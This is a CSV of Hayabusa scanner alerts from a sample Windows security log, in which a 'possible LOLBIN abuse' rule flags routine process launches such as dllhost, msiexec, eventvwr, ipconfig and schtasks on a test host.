2016-09-03 00:12:14.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x10f4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.238 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.356 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcb4 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.409 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.433 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x62c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1294 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xe34 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:14:02.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe28 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:14:02.270 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x3c4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:53:11.002 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 01:40:58.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc4c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 01:41:25.835 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.297 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcac | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.345 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1084 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.383 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x5a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x11f4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 04:22:52.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 04:25:19.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x140 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 04:25:27.075 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 06:16:47.905 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 06:24:11.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x15a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 06:24:11.188 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:26.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:26.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x568 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:27.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:27.571 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:27.649 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:47.904 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:48.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 8CC0B2472EAD000E5C8E33E07DDFD7D0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x690 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:49.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf6c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:24.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:24.155 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 34D9A5A4F5D0DC17DF8EDFC231FC5C94 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1390 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:50.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:50.481 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4E05AD2415D7F17D17A4D032A35E818C E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:53.494 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x1378 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:45:17.009 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:45:17.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding A8DCAAB671CE24380F54AE29F32412E9 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x145c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:45:55.086 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:45:55.181 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 227D6E86271C528C6720A7A85951F549 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:46:29.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x171c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:46:30.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 8E27A5AD152700C051A449A753DDD9AD E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1004 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:47:06.223 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x170c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:47:06.332 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding DC56F1E9E9C4D0F4AA05D75E20224E34 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x159c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:47:41.359 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x155c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:47:42.736 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 51E1FCDF5E179FDF27A43218C0B633B2 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1330 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:48:23.665 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:48:23.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4EC0FCB2436E18C9DDD97D27F3913CDB E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:48:46.838 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x6e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:48:47.001 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding DC5E7443C99933DB3C6E89F5CEB1E97F E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:49:56.148 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1608 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:49:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding FCF342A8AA47B271C771D0C94D1CA700 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x158c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:49:59.727 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x16ec | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:03.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:03.998 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 5E2017AA7D1C6A31E9A7DE000332388B E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x4cc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:11.414 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:11.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding BA71DC5EB60F0E63B6B2273896748ED0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x728 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:23.151 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1468 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:23.337 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 63DCF5B6F3ADD0E112DCFCDBC9A49554 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x554 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
